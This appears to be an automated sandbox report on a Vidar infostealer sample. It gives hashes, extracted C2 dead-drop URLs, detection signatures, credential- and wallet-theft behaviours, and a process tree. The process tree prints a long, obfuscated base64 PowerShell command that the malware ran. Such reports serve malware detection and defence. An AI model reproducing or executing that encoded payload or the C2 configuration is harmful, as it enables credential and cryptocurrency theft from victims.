Analysis
-
max time kernel
129s -
max time network
142s -
platform
windows10-2004_x64 -
resource
win10v2004-20250502-en -
resource tags
arch:x64arch:x86image:win10v2004-20250502-enlocale:en-usos:windows10-2004-x64system -
submitted
30/06/2025, 17:46
Static task
static1
Behavioral task
behavioral1
Sample
5255d3c35b51e27e3a6104307edb6f32a1521f9892c4c8e7fb50ec97ff4dc7bd.exe
Resource
win10v2004-20250502-en
Behavioral task
behavioral2
Sample
5255d3c35b51e27e3a6104307edb6f32a1521f9892c4c8e7fb50ec97ff4dc7bd.exe
Resource
win11-20250619-en
General
-
Target
5255d3c35b51e27e3a6104307edb6f32a1521f9892c4c8e7fb50ec97ff4dc7bd.exe
-
Size
951KB
-
MD5
600623ba27769989d981904debcc3774
-
SHA1
08b03982c2c7fe5b35f1379bca1e8832cb294764
-
SHA256
5255d3c35b51e27e3a6104307edb6f32a1521f9892c4c8e7fb50ec97ff4dc7bd
-
SHA512
42ede2b6dd77ab72afa1449e5bc2710c74e586c1468126814787c0b7ad6bfe69f6c0c58cc7b212594d217146c47c89af4f890464f726648ca9f0ea648a739328
-
SSDEEP
12288:G6yQn1ME0VKFY8eoVEaXltnHGsdCBh46dV51satxZ7YT928nIpSm8satxZ7YT92l:puE0Vsb8ImfhRsatx428Issatx428I
Malware Config
Extracted
vidar
14.4
5838abba2c7ca0756153b41aab8534b5
https://t.me/q0l0o
https://steamcommunity.com/profiles/76561199872233764
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/137.0.0.0 Safari/537.36 OPR/122.0.0.0
Signatures
-
Detect Vidar Stealer 40 IoCs
resource yara_rule behavioral1/memory/4128-0-0x0000000000400000-0x0000000000439000-memory.dmp family_vidar_v7 behavioral1/memory/4128-1-0x0000000000400000-0x0000000000439000-memory.dmp family_vidar_v7 behavioral1/memory/4128-2-0x0000000000400000-0x0000000000439000-memory.dmp family_vidar_v7 behavioral1/memory/4128-9-0x0000000000400000-0x0000000000439000-memory.dmp family_vidar_v7 behavioral1/memory/4128-10-0x0000000000400000-0x0000000000439000-memory.dmp family_vidar_v7 behavioral1/memory/4128-15-0x0000000000400000-0x0000000000439000-memory.dmp family_vidar_v7 behavioral1/memory/4128-16-0x0000000000400000-0x0000000000439000-memory.dmp family_vidar_v7 behavioral1/memory/4128-74-0x0000000000400000-0x0000000000439000-memory.dmp family_vidar_v7 behavioral1/memory/4128-194-0x0000000000400000-0x0000000000439000-memory.dmp family_vidar_v7 behavioral1/memory/4128-380-0x0000000000400000-0x0000000000439000-memory.dmp family_vidar_v7 behavioral1/memory/4128-383-0x0000000000400000-0x0000000000439000-memory.dmp family_vidar_v7 behavioral1/memory/4128-387-0x0000000000400000-0x0000000000439000-memory.dmp family_vidar_v7 behavioral1/memory/4128-388-0x0000000000400000-0x0000000000439000-memory.dmp family_vidar_v7 behavioral1/memory/4128-389-0x0000000000400000-0x0000000000439000-memory.dmp family_vidar_v7 behavioral1/memory/4128-393-0x0000000000400000-0x0000000000439000-memory.dmp family_vidar_v7 behavioral1/memory/4128-394-0x0000000000400000-0x0000000000439000-memory.dmp family_vidar_v7 behavioral1/memory/4128-398-0x0000000000400000-0x0000000000439000-memory.dmp family_vidar_v7 behavioral1/memory/4128-399-0x0000000000400000-0x0000000000439000-memory.dmp family_vidar_v7 behavioral1/memory/4128-400-0x0000000000400000-0x0000000000439000-memory.dmp family_vidar_v7 behavioral1/memory/4128-401-0x0000000000400000-0x0000000000439000-memory.dmp family_vidar_v7 behavioral1/memory/4128-404-0x0000000000400000-0x0000000000439000-memory.dmp family_vidar_v7 behavioral1/memory/4128-408-0x0000000000400000-0x0000000000439000-memory.dmp family_vidar_v7 behavioral1/memory/4128-409-0x0000000000400000-0x0000000000439000-memory.dmp family_vidar_v7 behavioral1/memory/4128-410-0x0000000000400000-0x0000000000439000-memory.dmp family_vidar_v7 behavioral1/memory/4128-414-0x0000000000400000-0x0000000000439000-memory.dmp family_vidar_v7 behavioral1/memory/4128-418-0x0000000000400000-0x0000000000439000-memory.dmp family_vidar_v7 behavioral1/memory/4128-419-0x0000000000400000-0x0000000000439000-memory.dmp family_vidar_v7 behavioral1/memory/4128-420-0x0000000000400000-0x0000000000439000-memory.dmp family_vidar_v7 behavioral1/memory/4128-1018-0x0000000000400000-0x0000000000439000-memory.dmp family_vidar_v7 behavioral1/memory/4128-1022-0x0000000000400000-0x0000000000439000-memory.dmp family_vidar_v7 behavioral1/memory/4128-1025-0x0000000000400000-0x0000000000439000-memory.dmp family_vidar_v7 behavioral1/memory/4128-1027-0x0000000000400000-0x0000000000439000-memory.dmp family_vidar_v7 behavioral1/memory/4128-1028-0x0000000000400000-0x0000000000439000-memory.dmp family_vidar_v7 behavioral1/memory/4128-1031-0x0000000000400000-0x0000000000439000-memory.dmp family_vidar_v7 behavioral1/memory/4128-1032-0x0000000000400000-0x0000000000439000-memory.dmp family_vidar_v7 behavioral1/memory/4128-1033-0x0000000000400000-0x0000000000439000-memory.dmp family_vidar_v7 behavioral1/memory/4128-1034-0x0000000000400000-0x0000000000439000-memory.dmp family_vidar_v7 behavioral1/memory/4128-1035-0x0000000000400000-0x0000000000439000-memory.dmp family_vidar_v7 behavioral1/memory/4128-1036-0x0000000000400000-0x0000000000439000-memory.dmp family_vidar_v7 behavioral1/memory/4128-1040-0x0000000000400000-0x0000000000439000-memory.dmp family_vidar_v7 -
Vidar family
-
Uses browser remote debugging 2 TTPs 3 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 2940 msedge.exe 1156 msedge.exe 2872 msedge.exe -
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 680 set thread context of 4128 680 5255d3c35b51e27e3a6104307edb6f32a1521f9892c4c8e7fb50ec97ff4dc7bd.exe 84 -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4440 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133957791950124683" chrome.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 5684 powershell.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 5684 powershell.exe 4128 MSBuild.exe 4128 MSBuild.exe 3192 chrome.exe 3192 chrome.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 5684 powershell.exe 5684 powershell.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe 4128 MSBuild.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 2940 msedge.exe 2940 msedge.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
description pid Process Token: SeDebugPrivilege 5684 powershell.exe Token: SeShutdownPrivilege 3192 chrome.exe Token: SeCreatePagefilePrivilege 3192 chrome.exe Token: SeShutdownPrivilege 3192 chrome.exe Token: SeCreatePagefilePrivilege 3192 chrome.exe Token: SeShutdownPrivilege 3192 chrome.exe Token: SeCreatePagefilePrivilege 3192 chrome.exe Token: SeShutdownPrivilege 3192 chrome.exe Token: SeCreatePagefilePrivilege 3192 chrome.exe -
Suspicious use of FindShellTrayWindow 27 IoCs
pid Process 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 2940 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 680 wrote to memory of 4128 680 5255d3c35b51e27e3a6104307edb6f32a1521f9892c4c8e7fb50ec97ff4dc7bd.exe 84 PID 680 wrote to memory of 4128 680 5255d3c35b51e27e3a6104307edb6f32a1521f9892c4c8e7fb50ec97ff4dc7bd.exe 84 PID 680 wrote to memory of 4128 680 5255d3c35b51e27e3a6104307edb6f32a1521f9892c4c8e7fb50ec97ff4dc7bd.exe 84 PID 680 wrote to memory of 4128 680 5255d3c35b51e27e3a6104307edb6f32a1521f9892c4c8e7fb50ec97ff4dc7bd.exe 84 PID 680 wrote to memory of 4128 680 5255d3c35b51e27e3a6104307edb6f32a1521f9892c4c8e7fb50ec97ff4dc7bd.exe 84 PID 680 wrote to memory of 4128 680 5255d3c35b51e27e3a6104307edb6f32a1521f9892c4c8e7fb50ec97ff4dc7bd.exe 84 PID 680 wrote to memory of 4128 680 5255d3c35b51e27e3a6104307edb6f32a1521f9892c4c8e7fb50ec97ff4dc7bd.exe 84 PID 680 wrote to memory of 4128 680 5255d3c35b51e27e3a6104307edb6f32a1521f9892c4c8e7fb50ec97ff4dc7bd.exe 84 PID 680 wrote to memory of 4128 680 5255d3c35b51e27e3a6104307edb6f32a1521f9892c4c8e7fb50ec97ff4dc7bd.exe 84 PID 680 wrote to memory of 4128 680 5255d3c35b51e27e3a6104307edb6f32a1521f9892c4c8e7fb50ec97ff4dc7bd.exe 84 PID 680 wrote to memory of 4128 680 5255d3c35b51e27e3a6104307edb6f32a1521f9892c4c8e7fb50ec97ff4dc7bd.exe 84 PID 4128 wrote to memory of 3192 4128 MSBuild.exe 87 PID 4128 wrote to memory of 3192 4128 MSBuild.exe 87 PID 4128 wrote to memory of 5684 4128 MSBuild.exe 88 PID 4128 wrote to memory of 5684 4128 MSBuild.exe 88 PID 3192 wrote to memory of 4632 3192 chrome.exe 90 PID 3192 wrote to memory of 4632 3192 chrome.exe 90 PID 3192 wrote to memory of 4756 3192 chrome.exe 91 PID 3192 wrote to memory of 4756 3192 chrome.exe 91 PID 3192 wrote to memory of 4756 3192 chrome.exe 91 PID 3192 wrote to memory of 4756 3192 chrome.exe 91 PID 3192 wrote to memory of 4756 3192 chrome.exe 91 PID 3192 wrote to memory of 4756 3192 chrome.exe 91 PID 3192 wrote to memory of 4756 3192 chrome.exe 91 PID 3192 wrote to memory of 4756 3192 chrome.exe 91 PID 3192 wrote to memory of 4756 3192 chrome.exe 91 PID 3192 wrote to memory of 4756 3192 chrome.exe 91 PID 3192 wrote to memory of 4756 3192 chrome.exe 91 PID 3192 wrote to memory of 4756 3192 chrome.exe 91 PID 3192 wrote to memory of 4756 3192 chrome.exe 91 PID 3192 wrote to memory of 4756 3192 chrome.exe 91 PID 3192 wrote to memory of 4756 3192 chrome.exe 91 PID 3192 wrote to memory of 4756 3192 chrome.exe 91 PID 3192 wrote to memory of 4756 3192 chrome.exe 91 PID 3192 wrote to memory of 4756 3192 chrome.exe 91 PID 3192 wrote to memory of 4756 3192 chrome.exe 91 PID 3192 wrote to memory of 4756 3192 chrome.exe 91 PID 3192 wrote to memory of 4756 3192 chrome.exe 91 PID 3192 wrote to memory of 4756 3192 chrome.exe 91 PID 3192 wrote to memory of 4756 3192 chrome.exe 91 PID 3192 wrote to memory of 4756 3192 chrome.exe 91 PID 3192 wrote to memory of 4756 3192 chrome.exe 91 PID 3192 wrote to memory of 4756 3192 chrome.exe 91 PID 3192 wrote to memory of 4756 3192 chrome.exe 91 PID 3192 wrote to memory of 4756 3192 chrome.exe 91 PID 3192 wrote to memory of 4756 3192 chrome.exe 91 PID 3192 wrote to memory of 4756 3192 chrome.exe 91 PID 3192 wrote to memory of 4924 3192 chrome.exe 92 PID 3192 wrote to memory of 4924 3192 chrome.exe 92 PID 3192 wrote to memory of 4528 3192 chrome.exe 93 PID 3192 wrote to memory of 4528 3192 chrome.exe 93 PID 3192 wrote to memory of 4528 3192 chrome.exe 93 PID 3192 wrote to memory of 4528 3192 chrome.exe 93 PID 3192 wrote to memory of 4528 3192 chrome.exe 93 PID 3192 wrote to memory of 4528 3192 chrome.exe 93 PID 3192 wrote to memory of 4528 3192 chrome.exe 93 PID 3192 wrote to memory of 4528 3192 chrome.exe 93 PID 3192 wrote to memory of 4528 3192 chrome.exe 93 PID 3192 wrote to memory of 4528 3192 chrome.exe 93 PID 3192 wrote to memory of 4528 3192 chrome.exe 93 PID 3192 wrote to memory of 4528 3192 chrome.exe 93 PID 3192 wrote to memory of 4528 3192 chrome.exe 93 PID 3192 wrote to memory of 4528 3192 chrome.exe 93 PID 3192 wrote to memory of 4528 3192 chrome.exe 93
Processes
-
C:\Users\Admin\AppData\Local\Temp\5255d3c35b51e27e3a6104307edb6f32a1521f9892c4c8e7fb50ec97ff4dc7bd.exe"C:\Users\Admin\AppData\Local\Temp\5255d3c35b51e27e3a6104307edb6f32a1521f9892c4c8e7fb50ec97ff4dc7bd.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:680 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"2⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4128 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"3⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3192 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff88865dcf8,0x7ff88865dd04,0x7ff88865dd104⤵PID:4632
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2004,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2000 /prefetch:24⤵PID:4756
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2224,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2236 /prefetch:34⤵PID:4924
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2372,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2516 /prefetch:84⤵PID:4528
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3148,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3168 /prefetch:14⤵PID:4704
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3172,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3204 /prefetch:14⤵PID:4612
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4192,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4244 /prefetch:24⤵PID:4844
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4520,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4572 /prefetch:14⤵PID:3740
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5112,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5104 /prefetch:84⤵PID:1700
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5432,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5364 /prefetch:84⤵PID:3668
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5100,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5136 /prefetch:84⤵PID:5480
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5676,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5692 /prefetch:84⤵PID:4044
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5712,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5844 /prefetch:84⤵PID:5804
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5136,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5868 /prefetch:84⤵PID:2552
-
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -OutputFormat Text -EncodedCommand "JAB7ADAAeAAxAGEAMgBiADMAYwB9AD0AWwBTAHkAcwB0AGUAbQAuAFIAYQBuAGQAbwBtAF0AOgA6AG4AZQB3ACgAKQA7ACQAewAwAHgANABkADUAZQA2AGYAfQA9ACYAKABbAGMAaABhAHIAWwBdAF0AKAA3ADEALAAxADAAMQAsADEAMQA2ACwANAA1ACwANgA4ACwAOQA3ACwAMQAxADYALAAxADAAMQApAC0AagBvAGkAbgAnACcAKQA6ADoAbgBlAHcAKAApADsAJAB7ADAAeAA3AGcAOABoADkAaQB9AD0AJABuAHUAbABsADsAJAB7ADAAeABqADAAawAxAGwAMgB9AD0AQAAoACkAOwAkAHsAMAB4AG0AMwBuADQAbwA1AH0APQAoAFsAYwBoAGEAcgBbAF0AXQAoADEAMQAxACwAOQA4ACwAOQA5ACwAOQA3ACwAMQAxADYALAAxADAANQAsADEAMQAxACwAMQAxADAAKQAtAGoAbwBpAG4AJwAnACkAOwAkAHsAMAB4AHAANgBxADcAcgA4AH0APQAxAC4ALgAxADAAfAAmACgAWwBjAGgAYQByAFsAXQBdACgANwAwACwAMQAxADEALAAxADEANAAsADYAOQAsADkANwAsADkAOQAsADEAMAA0ACwANAA1ACwANwA5ACwAOQA4ACwAMQAwADYALAAxADAAMQAsADkAOQAsADEAMQA2ACkALQBqAG8AaQBuACcAJwApAHsAJAB7ADAAeAAxAGEAMgBiADMAYwB9AC4ATgBlAHgAdAAoACkAfQA7ACQAewAwAHgAcwA5AHQAMAB1ADEAfQA9ACYAKABbAGMAaABhAHIAWwBdAF0AKAA3ADEALAAxADAAMQAsADEAMQA2ACwANAA1ACwAOAAwACwAMQAxADQALAAxADEAMQAsADkAOQAsADEAMAAxACwAMQAxADUALAAxADEANQApAC0AagBvAGkAbgAnACcAKQB8ACYAKABbAGMAaABhAHIAWwBdAF0AKAA4ADMALAAxADAAMQAsADEAMAA4ACwAMQAwADEALAA5ADkALAAxADEANgAsADQANQAsADcAOQAsADkAOAAsADEAMAA2ACwAMQAwADEALAA5ADkALAAxADEANgApAC0AagBvAGkAbgAnACcAKQAtAEYAaQByAHMAdAAgADMAOwAkAHsAMAB4AHYAMgB3ADMAeAA0AH0APQBbAFMAeQBzAHQAZQBtAC4ARwBDAF0AOgA6AEcAZQB0AFQAbwB0AGEAbABNAGUAbQBvAHIAeQAoACQAZgBhAGwAcwBlACkAOwAkAHsAMAB4AHkANQB6ADYAYQA3AH0APQAoAFsAYwBoAGEAcgBbAF0AXQAoADEAMAA5ACwAMQAxADEALAAxADEANAAsADEAMAAxACwAMQAwADYALAAxADEANwAsADEAMQAwACwAMQAwADcAKQAtAGoAbwBpAG4AJwAnACkAOwAkAHsAMAB4AGIAOABjADkAZAAwAGUAMQB9AD0AQAB7AGYAYQBrAGUAPQAnAGQAYQB0AGEAJwA7AG0AbwByAGUAPQAnAHMAdAB1AGYAZgAnAH0AOwAkAGEAPQAzADEAOQAyADsAJABiAD0AJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAHQAbQBwADYAMQBGADYALgB0AG0AcAAnADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACgAbgBFAHcALQBvAEIAagBFAEMAVAAgAHMAeQBzAHQARQBtAC4ASQBvAC4AQwBvAG0AUABSAEUAUwBzAEkATwBuAC4ARABFAGYAbABhAFQAZQBzAFQAUgBFAGEATQAoAFsAaQBPAC4AbQBlAE0ATwBSAHkAcwB0AFIARQBhAE0AXQBbAGMATwBuAHYARQByAHQAXQA6ADoAZgByAG8ATQBCAEEAUwBFADYANABzAHQAcgBpAG4ARwAoACcAcgBWAFgAZgBiADkAbwB3AEUASAA3AFAAWAArAEUAeABIAGgATABKAG8AQQB6AFEAZgBoAFIARgBLAGcAMwB0AFYAcQBuAFQATwBtAEIAYgBWADgAUwBEAFMAUQA0AFMAegBiAEUAagB4ADQARwB3AHcAdgA4ACsASgB6AEUAdABhAGIATwBwAFYAUABNAEQAdgBvAHQAOQA5ADkAMwBIAGQAeQBlAC8AUgBqADkAWABxADYAKwBMAFcAKwBxAHYAUAByAHcAegBtAG8AawBrAFEAawA3AEMAQwBKAEMARABQAG8ASgBzAEQAWQBrAEUAdwArAGYAbwB6AGsAQgBxAE4AYgAxAFUAQwBHAEIAUABMAGgAUgBuAFEARQBtAGMAZwBLACsAKwBtADUAVgA3AEwAZgBTAFEAMQBXAHAAUAB1AEMAUgAwAEQAQgA1AG4AZgBtAEwAcwAwAEQAbwBJAEsAYQBpAEEAZgBYAEMATABTAHQAUwAxAEQARwBQAGcAKwA2ADMASgBKAGwAYgBSACsAZQA4AFEARgBpAEUATABaAGMAZwBaAE8AbQAwAFkAYQBSAEsAeQBKAFIAcAB2AEUAZwBsAFIALwA5AEIAcABqADEASQBtAEYAVQByADcAawBrAGsAUQBQAEIANgBEAFcASQBVAGUASgBIADAAagBUAHUAYwAwADkASgBCAEgAUwBaAEsAZwBtADUASwBNAEsAaQBHAFIASwBBADIAWgBSAEEAUABIAHoAbQB6AGIANwB1AEMAegAzAE8AagBaAE4AbgBiAEwATAArAC8AeABzAEQAQQA2AE4AagA0AHYAagBEAGQAMgB2AHcAaQBlAEQAaQBtADkAagBHAEkAdQBwAE4AbgA0AEIAWQBJAEIANwBYAFkAYQAxAGsAdwBSAGwAUQBvAEgATQBvAFgAUABrAEMAcgBqAFcAZwByADAASgBRAFoAMgBMAGIAZwBxAEoARABFAEwAdQBBAHoAUABPAGEAZABvAGcAdwB2AHYAdAAzAFYARQB5AGkATABRAHAAVAB5AEIAVAA0AFQANQBGAEUAeQBOAGsAVgBuAEgAMQAvAFUAOQBGAEQASQBsAGQARQBBAHAAOQA4ADYAegArADAAeABZAEcALwB2AHkAeQBvADIAV